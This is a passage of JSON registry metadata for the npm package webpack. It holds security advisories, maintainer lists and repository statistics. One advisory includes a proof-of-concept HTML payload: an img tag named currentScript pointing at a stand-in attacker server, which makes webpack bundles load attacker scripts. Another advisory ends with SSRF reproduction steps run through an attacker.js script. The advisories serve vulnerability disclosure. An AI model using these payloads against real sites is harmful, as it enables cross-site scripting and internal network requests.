contains secret:    ${fmtBool(cacheHit)}`);\n      console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);\n\n      console.log(\"\\n[PERSISTENCE CHECK] files containing secret\");\n      for (const f of allHits.slice(0, 30)) console.log(`- ${f}`);\n      if (allHits.length \u003e 30) console.log(`- ... and ${allHits.length - 30} more`);\n    } catch (e) {\n      console.error(e);\n      process.exitCode = 1;\n    } finally {\n      compiler.close(() =\u003e {});\n    }\n  });\n})();\n```\n\n#### 4) Run\nTerminal A:\n```bash\nnode server.js\n```\n\nTerminal B:\n```bash\nnode attacker.js\n```\n\n#### 5) Expected\n\nExpected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed).\n\n### Impact\n\nVulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled).\n\nWho is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can:\n\ntrigger network requests from the build machine to internal-only services (SSRF behavior),\n\ncause content from outside the allow-list to be bundled into build outputs,\n\nand cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-02-05T18:35:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/webpack/webpack/security/advisories/GHSA-38r7-794h-5758","https://nvd.nist.gov/vuln/detail/CVE-2025-68157","https://github.com/advisories/GHSA-38r7-794h-5758"],"source_kind":"github","identifiers":["GHSA-38r7-794h-5758","CVE-2025-68157"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-05T19:00:07.540Z","updated_at":"2026-09-03T02:04:19.978Z","epss_percentage":0.002,"epss_percentile":0.09865,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOHI3LTc5NGgtNTc1OM4ABR_7","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zOHI3LTc5NGgtNTc1OM4ABR_7","packages":[{"ecosystem":"npm","package_name":"webpack","versions":[{"first_patched_version":"5.104.0","vulnerable_version_range":"\u003e= 5.49.0, \u003c 5.104.0"}],"purl":"pkg:npm/webpack"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOHI3LTc5NGgtNTc1OM4ABR_7/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00dnZqLTRjcHItcDk4Ns4AA--k","url":"https://github.com/advisories/GHSA-4vvj-4cpr-p986","title":"Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS","description":"### Summary\n\nWe discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nWe found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.\n\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n\n#### Gadgets found in Webpack\n\nWe identified a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript)\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nHowever, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.\n\n### PoC\n\nPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.\n\nConsider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:\n\n```\n// entry.js\nimport('./import1.js')\n  .then(module =\u003e {\n    module.hello();\n  })\n  .catch(err =\u003e {\n    console.error('Failed to load module', err);\n  });\n```\n\n```\n// import1.js\nexport function hello () {\n  console.log('Hello');\n}\n```\n\nThe webpack.config.js is set up as follows:\n```\nconst path = require('path');\n\nmodule.exports = {\n  entry: './entry.js', // Ensure the correct path to your entry file\n  output: {\n    filename: 'webpack-gadgets.bundle.js', // Output bundle file\n    path: path.resolve(__dirname, 'dist'), // Output directory\n    publicPath: \"auto\", // Or leave this field not set\n  },\n  target: 'web',\n  mode: 'development',\n};\n```\n\nWhen the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n  \u003ctitle\u003eWebpack Example\u003c/title\u003e\n  \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n  \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n  \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript src=\"./dist/webpack-gadgets.bundle.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.\n\n### Patch\n\nA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() =\u003e {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl \u0026\u0026 document) {\n/******/ \t\t\tif (document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :\u003e\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i \u003e -1 \u0026\u0026 (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nPlease note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-08-27T19:50:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986","https://nvd.nist.gov/vuln/detail/CVE-2024-43788","https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61","https://research.securitum.com/xss-in-amp4email-dom-clobbering","https://scnps.co/papers/sp23_domclob.pdf","https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270","https://github.com/advisories/GHSA-4vvj-4cpr-p986"],"source_kind":"github","identifiers":["GHSA-4vvj-4cpr-p986","CVE-2024-43788"],"repository_url":"https://github.com/webpack/webpack","blast_radius":21.3623050104456,"created_at":"2024-08-27T20:05:29.150Z","updated_at":"2026-09-03T02:07:32.813Z","epss_percentage":0.00959,"epss_percentile":0.59018,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dnZqLTRjcHItcDk4Ns4AA--k","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00dnZqLTRjcHItcDk4Ns4AA--k","packages":[{"ecosystem":"npm","package_name":"webpack","versions":[{"first_patched_version":"5.94.0","vulnerable_version_range":"\u003e= 5.0.0-alpha.0, \u003c 5.94.0"}],"purl":"pkg:npm/webpack"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dnZqLTRjcHItcDk4Ns4AA--k/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oYzZxLTJtcHAtcXc3as4AAyD3","url":"https://github.com/advisories/GHSA-hc6q-2mpp-qw7j","title":"Cross-realm object access in Webpack 5","description":"Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-13T03:30:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-28154","https://github.com/webpack/webpack/pull/16500","https://github.com/webpack/webpack/compare/v5.75.0...v5.76.0","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AU7BOXTBK3KDYSWH67ASZ22TUIOZ3X5G/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPSAXUTXBCCTAHTCX5BUR4YVP25XALQ3/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U2AFCM6FFE3LRYI6KNEQWKMXMQOBZQ2D/","https://github.com/advisories/GHSA-hc6q-2mpp-qw7j"],"source_kind":"github","identifiers":["GHSA-hc6q-2mpp-qw7j","CVE-2023-28154"],"repository_url":"https://github.com/webpack/webpack","blast_radius":0.0,"created_at":"2023-03-14T16:03:22.588Z","updated_at":"2026-09-03T02:10:19.796Z","epss_percentage":0.01409,"epss_percentile":0.70733,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oYzZxLTJtcHAtcXc3as4AAyD3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oYzZxLTJtcHAtcXc3as4AAyD3","packages":[{"ecosystem":"npm","package_name":"webpack","versions":[{"first_patched_version":"5.76.0","vulnerable_version_range":"\u003e= 5.0.0, \u003c 5.76.0"}],"purl":"pkg:npm/webpack"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oYzZxLTJtcHAtcXc3as4AAyD3/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack","docker_dependents_count":26816,"docker_downloads_count":7646895114,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":true,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack/codemeta","maintainers":[{"uuid":"sokra","login":"sokra","name":null,"email":"tobias.koppers@googlemail.com","url":null,"packages_count":110,"html_url":"https://www.npmjs.com/~sokra","role":null,"created_at":"2022-11-09T20:18:49.054Z","updated_at":"2022-11-09T20:18:49.054Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sokra/packages"},{"uuid":"jhnns","login":"jhnns","name":null,"email":"mail@johannesewald.de","url":null,"packages_count":75,"html_url":"https://www.npmjs.com/~jhnns","role":null,"created_at":"2022-11-09T20:18:49.057Z","updated_at":"2022-11-09T20:18:49.057Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jhnns/packages"},{"uuid":"evilebottnawi","login":"evilebottnawi","name":null,"email":"sheo13666q@gmail.com","url":null,"packages_count":225,"html_url":"https://www.npmjs.com/~evilebottnawi","role":null,"created_at":"2023-03-08T19:17:26.120Z","updated_at":"2023-03-08T19:17:26.120Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/evilebottnawi/packages"},{"uuid":"thelarkinn","login":"thelarkinn","name":null,"email":"sean.larkin1@gmail.com","url":null,"packages_count":25,"html_url":"https://www.npmjs.com/~thelarkinn","role":null,"created_at":"2023-03-24T09:58:28.358Z","updated_at":"2023-03-24T09:58:28.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/thelarkinn/packages"},{"uuid":"ev1stensberg","login":"ev1stensberg","name":null,"email":"evenstensberg@gmail.com","url":null,"packages_count":85,"html_url":"https://www.npmjs.com/~ev1stensberg","role":null,"created_at":"2026-02-11T06:09:33.045Z","updated_at":"2026-02-11T06:09:33.045Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ev1stensberg/packages"},{"uuid":"15000621931","login":"15000621931","name":null,"email":"784487301@qq.com","url":null,"packages_count":57,"html_url":"https://www.npmjs.com/~15000621931","role":null,"created_at":"2026-02-11T06:09:32.424Z","updated_at":"2026-02-11T06:09:32.424Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/15000621931/packages"},{"uuid":"__hai","login":"__hai","name":null,"email":"haijie0619@gmail.com","url":null,"packages_count":53,"html_url":"https://www.npmjs.com/~__hai","role":null,"created_at":"2026-02-11T06:09:33.084Z","updated_at":"2026-02-11T06:09:33.084Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/__hai/packages"},{"uuid":"avivkeller","login":"avivkeller","name":null,"email":"me@aviv.sh","url":null,"packages_count":69,"html_url":"https://www.npmjs.com/~avivkeller","role":null,"created_at":"2026-03-17T23:01:29.268Z","updated_at":"2026-03-17T23:01:29.268Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/avivkeller/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1010740,"name":"@juanger/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"juanger","versions_count":2,"first_release_published_at":"2020-10-12T07:30:12.793Z","latest_release_published_at":"2020-10-12T05:24:42.937Z","latest_release_number":"5.0.1-alpha.1","last_synced_at":"2026-09-03T00:16:13.944Z","created_at":"2022-04-07T19:09:55.298Z","updated_at":"2026-09-03T00:16:13.945Z","registry_url":"https://www.npmjs.com/package/@juanger/webpack","install_command":"npm install @juanger/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"beta":"5.0.0-beta.29","latest":"5.0.1-alpha.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom 